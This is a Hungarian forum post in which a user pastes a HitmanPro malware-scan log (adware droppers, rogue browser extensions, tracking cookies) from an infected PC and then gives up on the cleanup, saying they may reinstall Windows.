         10.3s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY17_2[1].txt
         10.3s C:ProgramDataInstallMateE7D82FE0cfg7_2.ini
         10.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX8[1].txt
         10.9s C:ProgramDataInstallMateE7D82FE0cfg8.ini
         11.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY3Halál_hajnalban_-_A_császár_utolsĂł_hadihajĂłja_(Szent_István_csatahajĂł)[1].mp4
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         11.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         17.1s C:ProgramDataInstallMate89CC910C
         17.1s C:ProgramDataInstallMate89CC910C
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         17.9s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}_Setup.dll
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Setup.ico
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Readme.txt
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Custom.dll
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Setup.exe
         33.1s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}TsuDll.dll
         33.3s C:ProgramDataMountainAppSetup
         33.6s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504
         33.6s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504
         33.6s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504entries
         33.6s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504doomed
         33.7s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionshcyaibp@u-.edu
         33.7s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionshcyaibp@u-.educontent
         33.8s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionsdkhb@fdgzvdd.edu
         33.8s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionsdkhb@fdgzvdd.educontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
         34.2s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.org
         35.6s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Setup.dat

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY1o[1].exe
      Size . . . . . . . : 857 576 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:45:08)
      Entropy  . . . . . : 7.8
      SHA-256  . . . . . : B332EFA7C56A5534850AB11ACA21A0D26AC5EC8F2832A17A9286256F7C8083B1
      Product  . . . . . : information
      Publisher  . . . . : DBMS
      Description  . . . : information
      Version  . . . . . : 3.8.0.0
      Copyright  . . . . : Copyright (c) 2014
      RSA Key Size . . . : 2048
      Source URL . . . . : hxxp://getmeegan.info/?e=bsp&publisher=2921&country=HU&dd=5&cid=324&vn=179&ind=6822001593211730907&exid=0&ssd=14078005137440387784&hid=10759681496681907507&osid=601&channel=0&sfx=1&jc=1&category_name=&install_date=20130615
      Authenticode . . . : Valid
    > Bitdefender  . . . : Gen:Variant.Adware.Dropper.103
    > Kaspersky  . . . . : not-a-virus:HEUR:AdWare.Win32.Agent.heur
      Fuzzy  . . . . . . : 103.0

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW8f78XWVQVmb[1].exe
      Size . . . . . . . : 1 797 160 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:44:41)
      Entropy  . . . . . : 7.9
      SHA-256  . . . . . : 4A0A5372B0149336B4A3BBF0FC9B7E8A64223E5465E79AB37F5C6D8AA1A5FB4F
      Product  . . . . . : information
      Publisher  . . . . : DBMS
      Description  . . . : information
      Version  . . . . . : 3.8.0.0
      Copyright  . . . . : Copyright (c) 2014
      RSA Key Size . . . : 2048
      Source URL . . . . : hxxp://getmeegan.info/?e=ytr&publisher=2921&country=HU&prv=Adblocker&ind=6822001593211730907&exid=0&ssd=14078005137440387784&hid=10759681496681907507&osid=601&channel=0&sfx=1&jc=1&category_name=YoutubeAdblocker&install_date=20130615
      Authenticode . . . : Valid
    > Bitdefender  . . . : Gen:Variant.Adware.Dropper.103
    > Kaspersky  . . . . : not-a-virus:HEUR:AdWare.Win32.Agent.heur
      Fuzzy  . . . . . . : 103.0

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW8YS_[1].exe
      Size . . . . . . . : 891 304 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:44:17)
      Entropy  . . . . . : 7.8
      SHA-256  . . . . . : 2C960C736C239552894004B520C12EF2E5652EBCAD37544373DE959D55588D47
      Product  . . . . . : information
      Publisher  . . . . : DBMS
      Description  . . . : information
      Version  . . . . . : 3.8.0.0
      Copyright  . . . . : Copyright (c) 2014
      RSA Key Size . . . : 2048
      Source URL . . . . : hxxp://getmeegan.info/?e=svon&publisher=2921&dd=4&country=HU&ind=6822001593211730907&exid=0&ssd=14078005137440387784&hid=10759681496681907507&osid=601&channel=0&sfx=1&jc=1&category_name=SaveOn&install_date=20130615
      Authenticode . . . : Valid
    > Bitdefender  . . . : Gen:Variant.Adware.Dropper.103
    > Kaspersky  . . . . : not-a-virus:HEUR:AdWare.Win32.Agent.heur
      Fuzzy  . . . . . . : 103.0

   C:UsersFabingAppDataLocalTemp{B10E9818-AD07-4782-A569-E5256AEDBAEE}Custom.dll
      Size . . . . . . . : 93 696 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:43:18)
      Entropy  . . . . . : 6.3
      SHA-256  . . . . . : CF5F78CB97369DC1FB25CF2B5B8DD49B8A6F4EA69055FFC0CE47618C1DC8365D
      Product  . . . . . : MountainApp
      Publisher  . . . . : MountainApp
      Description  . . . : Custom DLL for MountainA
      Version  . . . . . : 2014.6.
      Copyright  . . . . : Copyright © 2014 M
    > Bitdefender  . . . : Gen:Variant.Application.Kazy.365295
    > Kaspersky  . . . . : Trojan.Win32.AntiFW.b
      Fuzzy  . . . . . . : 102.0


Cookies _____________________________________________________________________

   C:UsersFabingAppDataRoamingMicrosoftWindowsCookiesLJ80MG69.txt
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:advertising-support.com
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:archant.122.2o7.net
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:doubleclick.net
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:in.getclicky.com
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:oracle.112.2o7.net
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:stat.mystat.hu
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:statcounter.com
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:statse.webtrendslive.com
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:www.googleadservices.com
   C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultcookies.sqlite:xiti.com


[/code]

A HitmanPro végig futott, talált is valamiket, de törölni nem engedte, reg. kulcs híján.

Érdekes. Őfelsége csatahajója youtubről letöltött film is köztük van.

Tárhely nem fogadja el a logfájlt, ide másolni pedig pofátlanság lenne.

A STEP 3, 4 megvolt, az 5-nek lejárt a próbaideje. Csak vásárlással engedett volna tovább- lépni, de nem hiszem, hogy ennyi vírusölő után jeleskedett volna.

Itt megállok a próbálgatásokkal. Ha lesz időm újra telepítem.

Ha más válasz nincs, akkor nem mentek ki semmit.

Kb. egy hónapja külső tárolóra kitettem, nem sok változás volt azóta. De egyébként sincs semmi lényeges a gépen. A lányom főiskolai dolga mindig külső mentésre került.

Egyébként is abszolvált. Az sem nagyon lényeges.

Köszönöm a segítséget, nem kérek több tippet.

EGY

KETTŐ

HÁROM

NÉGY

Nem mondtam, mert nem kérdezte senki.

Magamtól pedig?

Kérdezni is tudni kell.

132005

Pontosabban